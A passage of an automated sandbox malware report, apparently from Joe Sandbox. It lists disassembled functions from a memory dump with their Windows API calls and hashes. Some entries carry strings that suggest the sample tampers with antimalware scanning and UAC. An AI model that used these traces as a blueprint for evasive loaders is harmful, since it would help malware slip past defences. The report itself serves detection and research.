Instruction Fuzzy Hash: F3F0826630D2446FE704EAADAD80BABBBDC9B85210F05807AF948C7182DA20DC098365

Uniqueness

Uniqueness Score: -1.00%

Function 042004C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,04200524), ref: 042004F2

Strings

MS Shell Dlg 2, xrefs: 042004C1, 042004C3

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID: MS Shell Dlg 2
API String ID: 3660427363-3198668166
Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction ID: 7ab645b865326406f1945e5f5608b0b5570c3d0476a0b54eb451a1e357040366
Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction Fuzzy Hash: 67F030663091086BE704EAAEAD80FABBBDCDB85254F01813AB94CC7241DB21EC098361

Uniqueness

Uniqueness Score: -1.00%

Function 041EFACC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 041EFAED

Part of subcall function 041EF6D0: VariantClear.OLEAUT32(?), ref: 041EF6DF

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: f7b702742b67ac1df389bac58dfbf21f518ba920ec5cb98617a9702feb02167b
Instruction ID: 2b8f91cd30e6841b596f0907515b8e2c6472d0813e637f09496d7c0258212967
Opcode Fuzzy Hash: f7b702742b67ac1df389bac58dfbf21f518ba920ec5cb98617a9702feb02167b
Instruction Fuzzy Hash: 0911E928700B10A7EB24AF2BC8D097733D9DF852507198566EC4A8F295DB71FC43D755

Uniqueness

Uniqueness Score: -1.00%

Function 041EF768 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 041EF7A8

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 668ea34762dabdde4b8075589c8741bfcb37180c4d36a43421f8ab8e7ecd3318
Instruction ID: de89ed66f78219c0ab651129e339d50845c81471aa9de73f80641ddbf21e2260
Opcode Fuzzy Hash: 668ea34762dabdde4b8075589c8741bfcb37180c4d36a43421f8ab8e7ecd3318
Instruction Fuzzy Hash: 5C313C79B00A08BBEB14DFAAD8C49BA77E8EB09314F4545A6FD05D2250E734BA42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04200306 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,042004A2), ref: 04200374

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 328fe1633653f21328180393a7bddf9ba66f920ab9726a89f8b37d75f01a7810
Instruction ID: b215e9cd46b0e87aa4c586e1e0ba9ffc7cb63b635c198085f6f51b05f05af212
Opcode Fuzzy Hash: 328fe1633653f21328180393a7bddf9ba66f920ab9726a89f8b37d75f01a7810
Instruction Fuzzy Hash: 5621A734B00608AFF711DBA5D991BAEB7F9EB45304F108475A804D3292DB74AF04A644

Uniqueness

Uniqueness Score: -1.00%

Function 042005AE Relevance: 1.5, APIs: 1, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 042005DB

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7c9883ff9e2ea468f80ebf2f3a0718c6c053e2b99d8ed138ddcf65da09c81582
Instruction ID: dfa6d971ce05fa4f0614930b1df2a34e6500d6dbdc3dddceb2523eae776aa8ea
Opcode Fuzzy Hash: 7c9883ff9e2ea468f80ebf2f3a0718c6c053e2b99d8ed138ddcf65da09c81582
Instruction Fuzzy Hash: 1C012176700208AFE700DEA9DD80AAAB7ECDB59214F008166BD18D7241DB31AE0487A0

Uniqueness

Uniqueness Score: -1.00%

Function 042005B0 Relevance: 1.5, APIs: 1, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 042005DB

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: d6ba614917a2cc45bb5a74c5311f750dd9150f68595f6d1eb89ab066daf75888
Instruction ID: 016e313df51518dc757a38636ce3a9493bff039e50e04ee3dd0744d7008af405
Opcode Fuzzy Hash: d6ba614917a2cc45bb5a74c5311f750dd9150f68595f6d1eb89ab066daf75888
Instruction Fuzzy Hash: E7014476700208AFE700DEA9DDC0E9FB7ECDB59214F008166FD18D7241DB31AE0487A0

Uniqueness

Uniqueness Score: -1.00%

Function 041E738A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 041E73CB

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction ID: e6a1c9d5ffdaad37c80b261bd790cc5841984ded08f9d2efba8dc1844eb54d39
Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction Fuzzy Hash: 21F092B6700118BFAB80DE9DDC80EEB77ECEB4C264B054165FA0CD3200D630ED118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 041E738C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 041E73CB

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction ID: f8005f3d4569ebf2c758afcdea609e5d54265da8a8d97aa916e5b81133bd57fd
Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction Fuzzy Hash: 91F092B6600118BFAB80DE9DDC80EDB77ECEB4C264B054165FA0CD3200D630ED118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 041FEF38 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,041FEF85,?,?,?,00000000), ref: 041FEF65

Part of subcall function 041E4F68: SysFreeString.OLEAUT32(0423C89C), ref: 041E4F76

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: e5b4ed3a49ce8e0c88b1fcf75f83c1f0efa3d4832aed28174c7a933b7283d8f1
Instruction ID: 1c7b0ed395f77a7084aab2eab17a9f88bd12fc2ff297b62aaff4f13c507259dc
Opcode Fuzzy Hash: e5b4ed3a49ce8e0c88b1fcf75f83c1f0efa3d4832aed28174c7a933b7283d8f1
Instruction Fuzzy Hash: CEE0E534604B047FE700EBA2CC81969769CDB89608BA204B1F50093510DB717E0084A0

Uniqueness

Uniqueness Score: -1.00%

Function 041E5B78 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(041E0000,?,00000105), ref: 041E5B96

Part of subcall function 041E5DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,041E0000,0424A794), ref: 041E5DF8
Part of subcall function 041E5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,041E0000,0424A794), ref: 041E5E16
Part of subcall function 041E5DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,041E0000,0424A794), ref: 041E5E34
Part of subcall function 041E5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 041E5E52
Part of subcall function 041E5DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,041E5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 041E5E9B
Part of subcall function 041E5DDC: RegQueryValueExA.ADVAPI32(?,041E6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,041E5EE1,?,80000001), ref: 041E5EB9
Part of subcall function 041E5DDC: RegCloseKey.ADVAPI32(?,041E5EE8,00000000,?,?,00000000,041E5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 041E5EDB

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
Instruction ID: ae8836f8600b14b8b4ccb663ed08b8babca9cc9452d133f60bbe661e49d0ae77
Opcode Fuzzy Hash: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
Instruction Fuzzy Hash: 10E06D75A01614EFDF50DE98C9C0A9633D9AB08658F000691ED58CF346D3B0EA108BD4

Uniqueness

Uniqueness Score: -1.00%

Function 041E8D64 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 041E8D78

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
Instruction ID: c8e8c80697dc246133a213394903ecdab00a664f2b9a9329d9edda8d5ef21264
Opcode Fuzzy Hash: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
Instruction Fuzzy Hash: 79D05B763085107AE320A55B5CC4EBB5BDCDFC5770F500639B558C3180D720DC018371

Uniqueness

Uniqueness Score: -1.00%

Function 041E8DE0 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0423D4C6,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanString,0427A350,04247AE0,UacScan,0427A350,04247AE0,UacInitialize), ref: 041E8DEB

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2785c1fc5c6a4e355bfa7689c33097217eaa1f53bd37c8fc86f03cf53ba053af
Instruction ID: 0a858b245b2ddc722f34714d59f9bc3e3b3af3e132bf98f646b95fea39b32cca
Opcode Fuzzy Hash: 2785c1fc5c6a4e355bfa7689c33097217eaa1f53bd37c8fc86f03cf53ba053af
Instruction Fuzzy Hash: 0BC08CAC311A00072B5471FF0DC413A068899282393A40FA1A438C31E2D322F0A33024

Uniqueness

Uniqueness Score: -1.00%

Function 041E8E04 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0424062B,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanBuffer,0427A350,04247AE0,ScanString), ref: 041E8E0F

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
Instruction ID: 6e7c6cc37fa49dbe00f9c28aae15d260c4376eb70caf6bafa4e8e652ec4520e7
Opcode Fuzzy Hash: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
Instruction Fuzzy Hash: 03C04CA9711A000E6F94B5FF1DC457A06C84A552397A42FA1E469D31E2D726B4672510

Uniqueness

Uniqueness Score: -1.00%

Function 041E4F80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 041E4F93

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
Instruction ID: 63c5d4231c4749795292152850626774489b9e0cd4e1072cb2859a119779e150
Opcode Fuzzy Hash: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
Instruction Fuzzy Hash: EEC012B9A51A301BFB319A9E9CC0B6563DC9B49655F5800E1E504EB240E370F8004350

Uniqueness

Uniqueness Score: -1.00%

Function 041E4FA4 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0423C89C), ref: 041E4F76
SysReAllocStringLen.OLEAUT32(04248B50,0423C89C,00000016), ref: 041E4FBE

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
Instruction ID: 786f92dc18ffb3777e13ff190147808f2afe256af9fcec848c92fa70a03de677
Opcode Fuzzy Hash: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
Instruction Fuzzy Hash: C7D0126C904E0269AE2C552F49D483A6269AAD1B0179A82DC5802571C0E735F440D664

Uniqueness

Uniqueness Score: -1.00%

Function 04248710 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,04248704,00000000,00000001), ref: 04248720

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: fc77a7158173404f2b06ff58244cbd88d3e1d579a0130e88cf6f26fcf25da26f
Instruction ID: da4b484e3eeef69cdfeaad8880479ca1a4543fd0ad469b7384de6aade078d100
Opcode Fuzzy Hash: fc77a7158173404f2b06ff58244cbd88d3e1d579a0130e88cf6f26fcf25da26f
Instruction Fuzzy Hash: 89C092FC3A5300BAFA1066A61CE2F73158CE348B2CF105461F602EE2C2D2E6AD0046A1

Uniqueness

Uniqueness Score: -1.00%

Function 041E4F40 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 041E4F47

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
Instruction ID: 553d02c61c7b3bac6fc625545f97fad90491d5b7ccec166406982beb26df779b
Opcode Fuzzy Hash: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
Instruction Fuzzy Hash: B8B0122C30CE4220FE1020A70DC0B36029C1F00A44FC500D0AE18C00C6EB18F4156035

Uniqueness

Uniqueness Score: -1.00%

Function 041E4F58 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 041E4F5F

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
Instruction ID: 1fc26b2e463578ffdb1818a497ad4653a89bb1f0f46c5b4e661f9b55a1a77583
Opcode Fuzzy Hash: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
Instruction Fuzzy Hash: 9EA022AC000F0328AF0B323F08C0A3A22323FC0A083ECC0E800002A0008F3AB000C0A0

Uniqueness

Uniqueness Score: -1.00%

Function 041FE97C Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 041FE99A

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 89dc09eff5eb1cde181ade33ff8ad1be0045d59752270cf94872d845a2cc7225
Instruction ID: 360383f6ad434b7eb6c6abfb94082d22c1ca2be9053ca179f29c97912ca0c393
Opcode Fuzzy Hash: 89dc09eff5eb1cde181ade33ff8ad1be0045d59752270cf94872d845a2cc7225
Instruction Fuzzy Hash: 8D1145347407068BE750DF19C8C0B96F7E5FB883A0B10862AEA998B795D374F9058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 041E1668 Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,041E1A9F,?,041E209C), ref: 041E167E

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d0e79a16a76307a23b2372c67dd70f0f334ae3bc920dff1c345b159f9dfa5f3f
Instruction ID: 6b30265daa761ad3e0a965cbc416e9afabdb1c4bfadceeb4fde478dd40a8c793
Opcode Fuzzy Hash: d0e79a16a76307a23b2372c67dd70f0f334ae3bc920dff1c345b159f9dfa5f3f
Instruction Fuzzy Hash: 81F0F9F07113005FEB06DF7AAD847167AE2E7C9349F1481B9D609DB398E775A801CB10

Uniqueness

Uniqueness Score: -1.00%

Function 041E171E Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,041E209C), ref: 041E1740

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 81a167e81582a631c5da463713bf004b23bdbb1ed304f8a0f33c8037ffd822d6
Instruction ID: 210ea185bc5db998551846aceb1611ef28a651868e0c9f9d3ebc5e3d3f99c4f6
Opcode Fuzzy Hash: 81a167e81582a631c5da463713bf004b23bdbb1ed304f8a0f33c8037ffd822d6
Instruction Fuzzy Hash: 4EF0FAF6B00B507BE3108F4EACC0B96BBA0FB00361F040179FA0897340D3B0AC408B94

Uniqueness

Uniqueness Score: -1.00%

Function 041E1782 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,041E2080), ref: 041E17A0

Memory Dump Source

